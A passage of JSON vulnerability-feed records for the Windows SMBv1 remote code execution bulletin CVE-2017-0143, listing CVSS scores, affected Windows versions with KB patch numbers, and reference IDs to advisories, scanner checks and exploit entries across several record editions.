"kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core 
installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 
8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T08:45:23", "differentElements": ["msAffectedSoftware"], "edition": 70}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-20T10:55:46", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", 
"RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB3213986", "KB3210721", "KB3177186", "KB4012606", "KB4012217", "KB3212646", "KB4012212", "KB4012214", "KB3205401", "KB4013429", "KB4012215", "KB3205409", "KB4012213", "KBMS16-110, 3187754", "KB4012216", "KB4013198", "KB3210720"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 
for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T10:55:46", "differentElements": ["msAffectedSoftware"], "edition": 71}, {"bulletin": {"id": 
"MS:CVE-2017-0143", "hash": "f34700f5fafe59f3b729f742aac31bd5", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server; no credentials are required, consistent with the Au:N / PR:N CVSS vectors below.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-20T12:46:46", "history": [], "viewCount": 9, 
"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": 
["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KBMS16-110, 3187754", "KB3212646", "KB3210721", "KB4012598", "KB4013198", "KB4012215", "KB3205401", "KB4012606", "KB4012213", "KB3213986", "KB4012216", "KB4012217", "KB3210720", "KB4012212", "KB4012214", "KB3205409", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", 
"msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": 
"KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": 
